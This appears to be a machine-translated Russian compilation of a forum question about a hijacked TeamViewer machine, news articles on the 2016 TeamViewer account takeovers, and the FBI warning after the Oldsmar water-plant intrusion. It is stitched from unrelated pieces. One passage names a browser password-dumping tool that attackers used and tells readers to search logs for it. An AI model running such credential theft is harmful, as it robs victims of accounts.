Я использую teamviewer в личных целях для доступа к моей домашней сети, когда меня нет, и для доступа к различным компьютерам в моей домашней сети, когда я нахожусь дома (сохраняет прогулку по дому).У меня разные цели для каждого компьютера, и я предпочитаю получать доступ к отдельному компьютеру, а не пытаться дублировать или распространять задачи / приложения / программы. Обычно я оставляю несколько компьютеров постоянно работающими с teamviewer, чтобы я мог получить доступ к данным, которые они содержат.

В прошлом августе (2018 г.), когда я попытался войти на один из моих удаленных компьютеров, я заметил, что изменился идентификатор Teamviewer ID, что мне показалось странным. Тем не менее я вошел в машину и продолжил.

Примерно через неделю я получил письмо на свой адрес, в котором говорилось, что мой компьютер был взломан через teamviewer и что хакер получил доступ к моей электронной почте.Он сообщил мне, что загрузил на этот компьютер регистратор ключей, а также программное обеспечение для зеркалирования и доступ к камере, так что у него была запись всего, что я делал, а также видео того, как я действительно это делаю. Я использую этот компьютер только для сбора данных о торговле акциями, поэтому я не слишком беспокоился, что он будет иметь доступ ко всей моей сети через этот компьютер. Сообщение HI было в некоторой степени достоверным, поскольку он знал мой адрес электронной почты (не тот, который был зарегистрирован в Teamviewer), мой пароль teamviewer, а также мой идентификатор и пароль в facebook.Затем он потребовал выкуп, иначе он распространит мою личную информацию.

Я немедленно удалил Teamviewer с пораженной машины, переустановил ОС (Windows 7), установил новый брандмауэр и антивирусное программное обеспечение и с тех пор следил за машиной.

Я не установил teamviewer на пораженной машине. Я установил двухфакторную идентификацию на других своих машинах (к сожалению, раньше у меня не было ее ни на одном из моих компьютеров).

Я все еще хочу получить удаленный доступ к пораженному компьютеру, но очень опасаюсь снова загружать teamviewer.Я не уверен, как хакер вообще получил доступ к моей учетной записи (помимо случайной попытки ID). Я предполагаю, что он все еще следит за идентификатором, который ему ранее удалось переназначить.

Не мог бы кто-нибудь объяснить, как произошел предыдущий взлом (если они знакомы с ним) и как я могу изменить идентификатор teamviewer на этом компьютере, чтобы хакеру было нелегко возобновить свои усилия?

Все, что вам нужно знать

На этой неделе появились серьезные обвинения в хакерских атаках вокруг чрезвычайно популярного инструмента удаленного доступа TeamViewer.Отчеты, которые начались в конце мая, в основном указали на продолжающуюся атаку типа «злоумышленник в середине», в результате которой были обнаружены личные учетные записи пользователей TeamViewer.

Среди многочисленных сообщений об опустошении банковских счетов и счетов PayPal или их использовании для совершения несанкционированных покупок TeamViewer заявляет, что любая мошенническая или злонамеренная деятельность, скорее всего, является ошибкой пользователя.В этом хаосе TeamViewer нашла время для выпуска новых функций, направленных на усиление защиты данных пользователей, и я уверен, что ирония не ускользнет от тех, кто считает свои отсутствующие гроши.

Что именно происходит в TeamViewer? Неужели это просто совпадение, что так много аккаунтов, казалось бы, подверглись атаке одновременно? Были ли у пользователей скомпрометированы данные их учетных записей в результате другого взлома, и теперь они обнаруживают, что эти учетные данные используются против них? Или что-то еще происходит?

«Защита ваших личных данных лежит в основе всего, что мы делаем» — но защищают ли они себя в первую очередь? Давайте посмотрим, что мы знаем.

Что происходит?

TeamViewer оказались среди очень разгневанных пользователей.Обстрел связан с предполагаемой уязвимостью безопасности, присутствующей где-то в программном обеспечении TeamViewer, которая позволяет еще не названным и неизвестным злоумышленникам получать доступ к личным учетным записям пользователей через удаленный сеанс.

Подавляющее большинство пользователей заявляют, что их учетные записи были взломаны.После получения доступа хакеры просматривают список целей, пытаясь потратить или перевести деньги. Некоторые часто используемые учетные записи включают в себя:

  • PayPal
  • eBay
  • Amazon
  • Yahoo!
  • Walmart

Некоторые пользователи сообщили о потере тысяч долларов, в то время как другие видели, как многочисленные электронные подарочные карты были отправлены в различные места по всему миру.Покупки, совершаемые в Интернете, обычно имели бессмысленные названия для доставки, отправляемые в различные места по всему миру, при этом значительное количество пользователей сообщали о попытках входа в систему с китайских или тайваньских IP-адресов.

Масла в огонь подлили, когда в TeamViewer произошел сбой в обслуживании.Это было вызвано атакой типа «отказ в обслуживании» (DoS), направленной на нарушение работы серверов DNS (системы доменных имен) компаний, но TeamViewer утверждает, что «нет доказательств», связывающих атаку со скомпрометированными учетными записями пользователей.

Безопасность учетной записи пользователя

Пострадало большое количество учетных записей, хотя, безусловно, нет точных цифр, о которых можно было бы сообщить.Однако похоже, что большинство затронутых пользователей TeamViewer не использовали двухфакторную аутентификацию. Тем не менее, предполагаемые злоумышленники, похоже, использовали правильный пароль для входа в учетную запись и инициирования удаленного сеанса. Хотя вход в систему вызвал бы процесс 2FA, вход в удаленный сеанс — нет.

Некоторые пользователи активно использовали свою систему, заметили попытку удаленного входа в систему и смогли отменить запрос.Другие вернулись, чтобы найти завершенный удаленный сеанс, в то время как другие все еще осознали это только тогда, когда их учетные записи электронной почты внезапно заполнились квитанциями о покупках с eBay, Amazon и PayPal.

Ник Брэдли, руководитель практики в группе исследования угроз IBM, подробно рассказал о своем открытии:

«В середине игрового сеанса я теряю контроль над мышью, и в правом нижнем углу экрана появляется окно TeamViewer.Как только понимаю, что происходит, убиваю приложение. Затем меня осенило: у меня есть другие машины, на которых работает TeamViewer! Я бегу вниз, где еще один компьютер все еще работает. Низко и вот, появляется окно TeamViewer. Прежде чем я смогу убить его, злоумышленник открывает окно браузера и пытается перейти на новую веб-страницу. Как только я добираюсь до машины, я отменяю управление и закрываю приложение. Я немедленно перехожу на веб-сайт TeamViewer и меняю свой пароль, а также включаю двухфакторную аутентификацию.К счастью для меня, это были единственные две машины, на которых был установлен TeamViewer. Мне также повезло, что я был там, когда это произошло. Если бы я не был там, чтобы предотвратить нападение, кто знает, что было бы сделано. Вместо того чтобы обсуждать, как меня чуть не взломали, я бы говорил о серьезных последствиях утечки моих личных данных ».

Ответ

Ответ TeamViewer был решительным и постоянным:

«В TeamViewer нет нарушений безопасности»

Это линия компании, отраженная в многочисленных PR-заявлениях, выпущенных за последние несколько дней (битая ссылка удалена):

«В среду, 1 июня 2016 г., в TeamViewer произошел сбой в обслуживании.Сбой был вызван атакой типа «отказ в обслуживании» (DoS), направленной на инфраструктуру DNS-сервера TeamViewer. TeamViewer немедленно отреагировал, чтобы исправить проблему, чтобы восстановить все службы. Некоторые интернет-СМИ ложно связали инцидент с прошлыми заявлениями пользователей о том, что их учетные записи были взломаны, и теориями о возможных нарушениях безопасности в TeamViewer. У нас нет доказательств того, что эти проблемы связаны между собой. На самом деле:

  1. У TeamViewer возникли проблемы с сетью из-за DoS-атаки на DNS-серверы, и они были устранены.
  2. В TeamViewer нет нарушений безопасности.
  3. Независимо от инцидента TeamViewer непрерывно работает, чтобы обеспечить максимально возможный уровень защиты данных и пользователей ».

Кроме того, TeamViewer изменил положение своих пользователей, заявив, что, поскольку нарушений со стороны компании не было, вполне вероятно, что данные пользователя были украдены во время одного из других недавних крупных утечек данных и использовались для входа в учетные записи TeamViewer.

(битая ссылка удалена)

Надежные устройства и целостность данных

В разгар циркулирующих слухов TeamViewer объявила о запуске (удаление неработающей ссылки) своих программ «Надежные устройства» и «Целостность данных», «двух новых функций безопасности для дальнейшего улучшения защиты данных.«Я попытался связаться с TeamViewer, чтобы узнать, были ли эти функции запланированы заранее, или как прямой ответ на предполагаемый взлом, но пока не получил никакого ответа.

Надежные устройства гарантируют, что любые попытки входа на любое устройство в первый раз будут встречены с проблемой авторизации перед предоставлением доступа, в то время как целостность данных обеспечит немедленный сброс пароля, если учетная запись обнаружит подозрительную активность.

Что приводит нас к…

Все это привело к очень странному противостоянию между пользователями TeamViewer и самой компанией.

TeamViewer слишком хорошо понимают, что что-то не так:

«Защита ваших личных данных лежит в основе всего, что мы делаем.Мы высоко ценим ваше доверие и уважаем нашу ответственность за обеспечение вашей конфиденциальности. Вот почему мы всегда чувствуем острую необходимость принимать все необходимые меры для защиты ваших данных. Как вы, наверное, слышали, имели место беспрецедентные крупномасштабные кражи данных на популярных платформах социальных сетей и у других поставщиков веб-услуг. К сожалению, учетные данные, украденные в результате этих внешних взломов, были использованы для доступа к учетным записям TeamViewer, а также к другим службам. Мы потрясены поведением киберпреступников и испытываем отвращение к их действиям по отношению к пользователям TeamViewer.Они воспользовались преимуществом общего использования одной и той же информации учетной записи в нескольких службах, чтобы нанести ущерб «.

Вполне возможно, что множество взломанных учетных записей и мошенническая деятельность могли иметь место на фоне недавней утечки данных MySpace.В сочетании с другими серьезными нарушениями, такими как учетные записи, добавленные в результате взлома LinkedIn, и «старого» взлома Adobe несколько лет назад, безусловно, существует значительное количество учетных данных пользователей, которые могут быть получены тем, кто предложит самую высокую цену.

Но это объяснение не совсем режет горчицу.Хотя огромное количество пользователей не следовало лучшим методам защиты данных с использованием двухфакторной аутентификации и надежных, случайных одноразовых паролей, было также огромное количество таких пользователей — и их учетные записи также были скомпрометированы. Точно так же некоторые пользователи действительно были потенциально скомпрометированы из-за предыдущих утечек данных и обнаружили активный удаленный сеанс, но также было большое количество пользователей, чьи данные были конфиденциальными.

Проверка учетной записи

Если вы хотите немедленно проверить, был ли осуществлен доступ к вашей учетной записи, или попытка доступа была предпринята кем-либо, кроме вас, перейдите на веб-сайт TeamViewer Management Console.После того, как вы вошли в свою учетную запись, перейдите в правый верхний угол и щелкните свое имя пользователя, а затем нажмите Изменить профиль . Затем выберите Active Logins . В нем будут перечислены все устройства и места, которые имели доступ к вашей учетной записи за последний год.

Вы также можете проверить свои журналы TeamViewer на наличие незапланированных действий.Журналы можно найти здесь:

  • C: \ Program Files \ TeamViewer \ TeamViewerXX_Logfile.txt
  • C: \ Program Files \ TeamViewer \ TeamViewerXX_Logfile_OLD.txt

Зайдите в свой журнал и прочтите его. Проверьте наличие неправильных IP-адресов. Найдите в журнале « webbrowserpassview.exe» , и если вы получите положительный результат, немедленно измените все свои пароли .

Нет, я не шучу.Это приложение, по сути, обнаруживает и экспортирует все ваши текущие сохраненные пароли браузера в легко читаемый текстовый файл. Он также обходит мастер-пароли, установленные в Chrome и Firefox. Это не супер-хакерский инструмент. Он находится в открытом доступе, но может быть чрезвычайно опасен в чужих руках.

Вам также следует отправиться на сайт haveibeenpwned.com, чтобы проверить, не была ли какая-либо из ваших учетных записей взломана без вашего ведома.

Пора серьезно относиться к безопасности TeamViewer

Если у вас есть учетная запись TeamViewer, немедленно измените пароль и включите двухфакторную аутентификацию.Если вы недовольны, просто удалите TeamViewer, пока этот фиаско не закончится.

Проверьте свои покупки на eBay, Amazon, PayPal и Apple Store и внимательно посмотрите на свои исходящие банковские транзакции за последнюю неделю.Если что-то происходит, обратитесь непосредственно к поставщику, объясните, что произошло, и упомяните TeamViewer. Это должно помочь вашим делам вернуться в нормальное русло. О, обязательно прочтите этот подробный список лучших практик TeamViewer от Redditor и пользователя TeamViewer chubbysumo.

Это сложная ситуация для оценки.Можно было понять точку зрения TeamViewer. По их словам, их серверы остались нетронутыми. Они по-прежнему могут предлагать свои услуги удаленного доступа в обычном режиме. Большинство пользователей по-прежнему могут получить доступ к своим учетным записям и использовать сервис как есть.

Но это не объясняет огромного количества, казалось бы, взломанных аккаунтов.Это также не объясняет, как учетные записи пользователей с надежными и надежными одноразовыми паролями были взломаны таким же образом, как и учетные данные пользователей с уже украденными учетными данными. Это также не объясняет, почему некоторые пользователи по-прежнему видят огромное количество входящих попыток с китайских и тайваньских IP-адресов.

TeamViewer мог бы справиться со всей ситуацией значительно лучше.Немедленно упрекать тех, у кого есть очевидные проблемы, связанные непосредственно с их службой удаленного рабочего стола, немного несправедливо, учитывая огромное количество людей, предъявляющих чрезвычайно похожие жалобы. Но как только дело дошло и начались стандартные ответы, TeamViewer ограничил объем своих будущих ответов, подрывая собственную репутацию, обесценивая неудачный опыт своих пользователей.

Я не совсем уверен, что это может быть вина пользователей с недостаточными навыками безопасности.Тем не менее, я хотел бы увидеть некоторые более конкретные свидетельства, указывающие на реальный взлом, конкретный эксплойт или некоторую форму вредоносного ПО, которое «позволило» этому произойти, прежде чем TeamViewer обрушится на более потенциально несправедливое клеймо.

Обновление: обнаружено вредоносное ПО для совместного использования DLL

TeamViewer обратился ко мне непосредственно в субботу вечером (4 июня 2016 г.), принёс «безоговорочные извинения» за текущие проблемы, а также за возложение «вины» на своих пользователей.Они понимают, как некоторые из формулировок, используемых в их PR-заявлениях, могли легко расстроить пользовательскую базу.

Однако они категорически утверждают, что в их сервисе нет основной уязвимости, а также подчеркивают, что они продолжают использовать протокол безопасного удаленного пароля.Кроме того, TeamViewer подтвердил, что их новые «функции безопасности действительно были продвинуты», чтобы предоставить своим пользователям дополнительную помощь в то время, когда их платформа определенно подвергается «злоупотреблениям».

С тех пор, как эта статья была опубликована в субботу днем, я также был предупрежден о вредоносном ПО, использующем TeamViewer в качестве вектора атаки.Вредоносная программа BackDoor.TeamViewer49 устанавливается через вредоносное обновление Adobe Flash на уже взломанные компьютеры и может стать потенциальным бэкдором для злоумышленников. Чтобы уточнить: это не нарушение TeamViewer (неработающая ссылка удалена), а троянец, использующий общую библиотеку TeamViewer DLL в качестве ловушки для установки в системе.

Сталкивались ли вы с проблемами в TeamViewer? Вы что-нибудь потеряли? Вы связались с TeamViewer? Расскажите нам о своем опыте ниже!

Кредит изображения: грабитель достигает вас от agoxa через Shutterstock

10 самых безопасных сайтов для загрузки бесплатного программного обеспечения для Windows

Многие сайты загрузки программного обеспечения загружены вредоносными программами.Вот самые безопасные сайты, которым вы можете доверять, когда вам нужна бесплатная загрузка программного обеспечения.

Об авторе Гэвин Филлипс (Опубликовано 769 статей)

Гэвин — младший редактор отдела Windows and Technology Explained, постоянный участник Really Useful Podcast и редактор дочернего сайта MakeUseOf, посвященного криптографии, Blocks Decoded.У него есть степень бакалавра (с отличием) в области современного письма с использованием методов цифрового искусства, разграбленных на холмах Девона, а также более десяти лет профессионального писательского опыта. Он любит много пить чая, настольные игры и футбол.

Более От Гэвина Филлипса
Подпишитесь на нашу рассылку новостей

Подпишитесь на нашу рассылку, чтобы получать технические советы, обзоры, бесплатные электронные книги и эксклюзивные предложения!

Еще один шаг…!

Подтвердите свой адрес электронной почты в только что отправленном вам электронном письме.

Обеспокоены взломом TeamViewer? Вот бесплатный инструмент для помощи

В последние дни в новостях появлялись сообщения о взломе широко используемого решения удаленного управления TeamViewer. Представитель TeamViewer в беседе с Arstechnica сказал, что «количество поглощений было« значительным », но он продолжал утверждать, что взломы являются результатом паролей пользователей, которые были скомпрометированы в результате кластера недавно обнаруженных мега-проникновений.Некоторые пользователи, однако, также сообщали о нарушениях, даже когда использовалась 2FA, но TeamViewer, как утверждается, исследовал эти случаи, когда были предоставлены файлы журналов, и не обнаружил никаких доказательств нарушения 2FA. Взлом означает, что каждый, у кого установлено решение, должен либо изменить свой пароль, либо код доступа, а также проверить, не были ли произведены нежелательные платежи.

Что именно произошло с TeamViewer?

Пользователи TeamViewer видели всплывающее окно TeamViewer, видели движение их мыши и даже заметили, что платежи были выполнены через учетные записи eBay или PayPal без согласия пользователя, находящегося за клавиатурой.Но означает ли это, что TeamViewer взломали?

Официальный ответ TeamViewer — «нет». Люди, имеющие доступ к удаленным машинам, могли использовать слабые пароли или повторно использовать пароли, чтобы упростить использование при входе в систему. Когда этот пароль взломан, посторонний может захватить машины, находящиеся под удаленным управлением. С другой стороны, были скомпрометированы и пользователи с надежными уникальными паролями. Не было никаких реальных доказательств (представленных) того, был ли взломан сам TeamViewer, но сейчас считается, что 642 миллиона учетных записей пользователей находятся в открытом доступе.Однако отчеты скомпрометированного пользователя показывают, что это была атака, нацеленная на пользователей TeamViewer (сторона удаленного управления). На момент написания следствие еще не закрыто.

Решения

Вместо того, чтобы указывать пальцем на виноватых, лучше сначала обезопасить себя и начать решать проблему. Таким образом, сам TeamViewer выпустил две новые функции и принудительно сбросил пароль для входа:

  • Белый список TeamViewerID: Все ранее утвержденные входящие соединения необходимо подтвердить еще раз, чтобы разрешить удаленное управление.Таким образом, если ИТ-администратор, сотрудник службы поддержки или вы входите в систему на удаленных машинах, пользователь за клавиатурой должен подтвердить это соединение.
  • Целостность данных: Эта функция будет отслеживать «нормальное» поведение и предупреждать всякий раз, когда управление осуществляется из нестандартного места.
  • Сброс пароля: TeamViewer пометил ВСЕ учетные записи пользователей, чтобы обновить их пароль. Это означает, что для каждой учетной записи пользователя TeamViewer необходимо ввести новый пароль. Если учетные данные были украдены, они теперь становятся бесполезными.

В TeamViewer есть еще одна функция, которую можно включить. Это называется 2FA или двухфакторной аутентификацией. Когда 2FA включен, он делает любую учетную запись немного более безопасной для входа в систему и работает с использованием одного «статического» пароля и одной переменной, которая изменяется при каждом входе в систему и отправляется либо на ваш телефон, либо на любое устройство по вашему выбору.

Как узнать, что меня взломали, и что мне делать?

Есть несколько шагов, чтобы узнать, был ли ваш компьютер взломан, в том числе:

  • Проверка любого необъяснимого использования ваших учетных записей eBay или PayPal среди других
  • Изучите, были ли какие-либо изменения в настройках на вашем компьютере
  • Пройти историю просмотров и проверьте наличие необычных записей
  • Просмотрите отправленные сообщения электронной почты на предмет необычной активности
  • Если вы более опытный пользователь, вы также можете проверить журналы TeamViewer.

После проверки на предмет необычной активности на вашем компьютере вам потребуется дополнительная защита, поэтому не забудьте:

  • Сменить пароли на любые неправильно используемые платформы (eBay, PayPal, даже игровые учетные записи), как только можно и не позволять браузеру запоминать пароли; вместо этого используйте менеджер паролей (это также избавит вас от повторного использования паролей).
  • Свяжитесь с соответствующей платежной платформой, чтобы начать процедуру возмещения.

Как насчет бесплатного инструмента, который поможет вам в будущем?

Эти шаги, к сожалению, не предупредят вас о том, что вашим компьютером все еще может быть удаленное управление.К счастью, наш собственный Николас Аквилина, исследователь безопасности здесь, в GFI Software, создал сценарий, который сообщит вам через SMS или по электронной почте о том, управляется ли ваша машина удаленно. .zip-файл можно загрузить, щелкнув здесь .

Как это работает?

Сценарий (в виде exe-файла) будет постоянно следить за файлом TeamViewer11_Logfile.log, и как только кто-то подключится и TeamViewerID НЕ будет в белом списке, он уведомит вас по SMS или электронной почте.SMS можно отправить через такие службы, как Clickatell, или же электронное письмо можно отправить через вашего собственного интернет-провайдера / почтового сервера на адрес по вашему выбору.

Чтобы включить эту функцию внешнего оповещения:

  • Разархивируйте найденный здесь файл,
  • Откройте папку и откройте config.ini с помощью блокнота (инструкции о значениях указаны в комментариях к файлу)
  • Сохранить, закрыть и запустите TeamViewerLogMonitor.exe

Доступ к машине TeamViewer, не внесенного в белый список, теперь отслеживается.Если обнаруживается что-то необычное, настроенным получателям будет отправлено SMS или электронное письмо (или и то, и другое). Этот сценарий не будет останавливать никаких подключений, а только предупредит вас, когда машина будет захвачена.

После атаки Oldsmar ФБР предупреждает об использовании TeamViewer и Windows 7

Изображение: ZDNet

После инцидента в Oldsmar, когда неустановленный злоумышленник получил доступ к сети водоочистных сооружений и изменил дозировку химикатов до опасного уровня, ФБР во вторник разослало предупреждение, обратив внимание на три проблемы безопасности, которые были замечены на сеть завода после взлома на прошлой неделе.

Предупреждение, называемое Уведомлением частной отрасли или ПИН-кодом ФБР, предупреждает об использовании устаревших систем Windows 7, ненадежных паролей и программного обеспечения для совместного использования рабочего стола TeamViewer, призывая частные компании, федеральные и правительственные организации проверять внутренние сети. и политики доступа соответственно.

TeamViewer считал точку входа

PIN-код ФБР специально называет TeamViewer программным обеспечением для совместного использования рабочего стола, за которым следует следить после того, как приложение было подтверждено как точка входа злоумышленника в сеть водоочистных сооружений Oldsmar.

Согласно сообщению Reuters, официальные лица заявили, что злоумышленник дважды подключался к компьютеру в сети водоочистной станции Oldsmar через TeamViewer в прошлую пятницу.

Во втором случае злоумышленник активно контролировал мышь оператора, перемещал ее по экрану и вносил изменения в уровни гидроксида натрия (щелочи), добавляемые в питьевую воду.

Оператор почти сразу отменил внесенные хакером изменения, но инцидент мгновенно стал предметом разногласий и обсуждений среди специалистов по безопасности.

Среди наиболее частых тем, поднимавшихся в онлайн-обсуждениях, было использование приложения TeamViewer для доступа к ресурсам критически важной инфраструктуры США.

В отчете Motherboard, опубликованном во вторник, несколько известных экспертов по безопасности раскритиковали компании и сотрудников, которые часто используют программное обеспечение для удаленной работы, назвав его небезопасным и неадекватным для управления конфиденциальными ресурсами.

Хотя предупреждение ФБР по PIN-коду не содержит критического тона или позиции по отношению к TeamViewer, ФБР хотело бы, чтобы организации федерального и частного секторов обратили внимание на приложение.

«Помимо законного использования, TeamViewer позволяет киберпреступникам осуществлять удаленный контроль над компьютерными системами и передавать файлы на компьютеры-жертвы, что делает его функционально похожим на троянов удаленного доступа (RAT)», — заявило ФБР.

«Тем не менее, законное использование TeamViewer делает аномальные действия менее подозрительными для конечных пользователей и системных администраторов по сравнению с обычными RAT.

В предупреждении ФБР организациям конкретно не говорится об удалении TeamViewer или любого другого программного обеспечения для совместного использования рабочего стола, но предупреждается, что TeamViewer и другое аналогичное программное обеспечение могут подвергаться злоупотреблениям, если злоумышленники получают доступ к учетным данным сотрудников или если учетные записи удаленного доступа (например, те, которые используются для доступа RDP в Windows) защищены слабыми паролями.

ФБР предупреждает об использовании Windows 7 … снова

Кроме того, предупреждение ФБР также предупреждает о продолжении использования Windows 7, операционной системы, срок эксплуатации которой истек в прошлом году, 14 января 2020 г. Об этой проблеме ФБР также предупреждало американские компании в прошлом году.

Эта часть предупреждения была включена, потому что водоочистная станция Oldsmar все еще использовала системы Windows 7 в своей сети, согласно отчету правительства Массачусетса.

Хотя нет никаких доказательств того, что злоумышленники злоупотребляли ошибками, связанными с Windows 7, ФБР заявляет, что продолжать использовать старую операционную систему опасно, поскольку ОС не поддерживается и не получает обновлений безопасности, что в настоящее время оставляет многие системы уязвимыми для атак. через недавно обнаруженные уязвимости.

Однако отчет Cyberscoop, опубликованный сегодня, подчеркивает тот факт, что завод Oldsmar, как и многие другие водоочистные сооружения в США, часто недофинансируется и недоукомплектован персоналом.

Хотя ФБР предостерегает от использования Windows 7 по уважительным причинам, многие компании, федеральные и государственные агентства США могут быть не в состоянии что-либо с этим поделать, исключая серьезные финансовые вложения в модернизацию ИТ-инфраструктуры со стороны высшего руководства, что не является ожидается в ближайшее время во многих местах.

В этих случаях ФБР рекомендует ряд основных передовых методов обеспечения безопасности в качестве промежуточного способа смягчения угроз, например:

  • Используйте многофакторную аутентификацию;
  • Используйте надежные пароли для защиты учетных данных протокола удаленного рабочего стола (RDP);
  • Убедитесь, что антивирусные, спам-фильтры и брандмауэры обновлены, правильно настроены и безопасны;
  • Аудит сетевых конфигураций и изоляция компьютерных систем, которые не могут быть обновлены;
  • Проверьте свою сеть на наличие систем, использующих RDP, закрытия неиспользуемых портов RDP, применения двухфакторной аутентификации везде, где это возможно, и регистрации попыток входа в систему RDP;
  • Журналы аудита для всех протоколов удаленного подключения;
  • Обучить пользователей выявлять попытки социальной инженерии и сообщать о них;
  • Выявление и приостановка доступа пользователей, проявляющих необычную активность;
  • Следите за обновлениями программного обеспечения.
В TeamViewer подозревается взлом

после того, как пользователи сообщают о несанкционированных подключениях — Nouvelles de sécurité

TeamViewer, популярное программное обеспечение для подключения к удаленному рабочему столу, которое позволяет людям делиться экранами и удаленным доступом, было взломано неизвестными третьими сторонами. По словам нескольких пользователей, в последние несколько дней на Reddit начали появляться отчеты о несанкционированном доступе, что привело к рейдам на учетные записи PayPal, eBay и Amazon с использованием украденных учетных данных, хранящихся в браузере.Это произошло примерно в то время, когда у компании возникли возможные проблемы с DNS, которые вызвали сбой на пару часов.

TeamViewer изначально утверждал, что не было проблем с их системой, а скорее с индивидуальными учетными данными пользователей. Учитывая недавние нарушения безопасности LinkedIn, Tumblr и MySpace, когда миллионы комбинаций адресов электронной почты и паролей были взломаны из-за повторного использования учетных данных для входа на различных сайтах и ​​в службах, TeamViewer утверждает, что это не было взломано напрямую и что нарушение, вероятно, было остановлено. от повторного использования этих скомпрометированных паролей.«TeamViewer возмущена любой преступной деятельностью; однако источником проблемы, согласно нашему исследованию, является неосторожное использование, а не потенциальное нарушение безопасности со стороны TeamViewer », — говорится в заявлении TeamViewer от 23 мая. Однако даже пользователи с надежными паролями и двухфакторной аутентификацией жаловались, что их учетные записи TeamViewer были поражены.

[ПРОЧИТАЙТЕ: 117 миллионов писем и паролей были украдены в результате взлома LinkedIn в 2012 году]

TeamViewer дополнительно указал, что: «ни TeamViewer не был взломан, ни бреши в безопасности нет, TeamViewer безопасен в использовании и имеет надлежащие меры безопасности, наши доказательства указывают на небрежное использование как причину сообщенной проблемы, несколько дополнительных шаги предотвратят возможное злоупотребление.«Тем не менее, компания по-прежнему не обращалась к недавним сообщениям о несанкционированном доступе, а просто отразила заявление от 23 мая. Только 1 июня TeamViewer выпустила обновленное заявление, касающееся сбоев и несанкционированных подключений.« В TeamViewer произошел сбой в обслуживании 1 июня. Сбой был вызван атакой типа «отказ в обслуживании» (DoS), направленной на инфраструктуру DNS-сервера TeamViewer. TeamViewer немедленно отреагировал, чтобы исправить проблему, чтобы восстановить все службы ». В нем добавлено:« Некоторые интернет-СМИ ложно связали инцидент с прошлыми заявлениями пользователей о том, что их учетные записи были взломаны, и теориями о возможных нарушениях безопасности в TeamViewer. У нас нет доказательств того, что эти проблемы связаны ».

В заявлении также намекает, что пользователям следует избегать загрузки программного обеспечения TeamViewer с сайтов бесплатного программного обеспечения, где оно может быть перепаковано с помощью вредоносных программ. «Пользователи должны избегать всех партнерских или рекламных пакетов. Хотя пользователи могут думать, что они просто загружают безобидную программу, на самом деле они могут установить что-то еще. Пользователи должны загружать TeamViewer только через официальные каналы TeamViewer », — сказал TeamViewer. Он также призывает всех использовать двухфакторную аутентификацию, которая может помочь предотвратить взломы удаленного доступа к системам пользователей.

Вот несколько рекомендаций по защите пользователей TeamViewer от этой угрозы:

  • Изменить пароли в учетной записи TeamViewer
  • Выйдите из учетной записи TeamViewer на всех машинах, на которых запущено программное обеспечение, чтобы избежать доступа, полученного с помощью комбинации имени пользователя и пароля
  • Проверьте неожиданные входящие подключения, открыв файлы журнала в разделе «Дополнительно»
  • Проверить выписки по кредитным картам, в том числе PayPal, на подозрительную активность

СКРЫТЬ

Нравится? Добавьте эту инфографику на свой сайт:
1.Щелкните поле ниже. 2. Нажмите Ctrl + A, чтобы выбрать все. 3. Нажмите Ctrl + C, чтобы скопировать. 4. Вставьте код на свою страницу (Ctrl + V).

Изображение будет иметь тот же размер, что и выше.

Взломано

учетных записей — измените пароль при использовании TeamViewer — Нью-Джерси, Нью-Йорк

TeamViewer, компания, стоящая за популярной платформой для удаленного рабочего стола, которая позволяет пользователям делиться своими экранами, получать удаленный доступ к своим компьютерам или участвовать в онлайн-конференциях, была взломана… возможно.Чуть больше месяца назад компания получила отчеты от множества пользователей, которые утверждали, что к их аккаунтам получили доступ неавторизованные пользователи.

Компания почти сразу же заявила, что взлома не было, и не спешила серьезно относиться к заявлениям пользователей. Одновременно с ростом жалоб пользователей сеть компании была нарушена серьезной атакой DoS (отказ в обслуживании).

В течение следующих нескольких недель реакция компании изменилась, как в связи с негативной реакцией со стороны их пользовательской базы, так и в связи с появлением новых свидетельств.Компания по-прежнему настаивает на том, что ее сети не были скомпрометированы, и что зарегистрированные взломы учетных записей и DoS-атаки никак не связаны, но теперь признает, что неуказанное количество учетных записей пользователей было скомпрометировано.

В настоящее время считается, что учетные записи были взломаны с использованием паролей, полученных в результате недавних мега-взломов, связанных с сотнями миллионов учетных записей пользователей из LinkedIn, MySpace, Tumblr и других социальных сетей.По словам представителей компании, проблема заключается в том, что значительная часть их пользовательской базы использует один и тот же пароль для нескольких разных учетных записей. Если, например, пользователь LinkedIn устанавливает свой пароль TeamViewer таким образом, чтобы он совпадал с паролем в LinkedIn, то, как только хакер получит доступ к одному из них, он сможет получить доступ к другому.

Это явление отнюдь не ново, и эксперты по безопасности уже много говорили о нем.

Обновлено: 10.03.2021 — 09:32

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *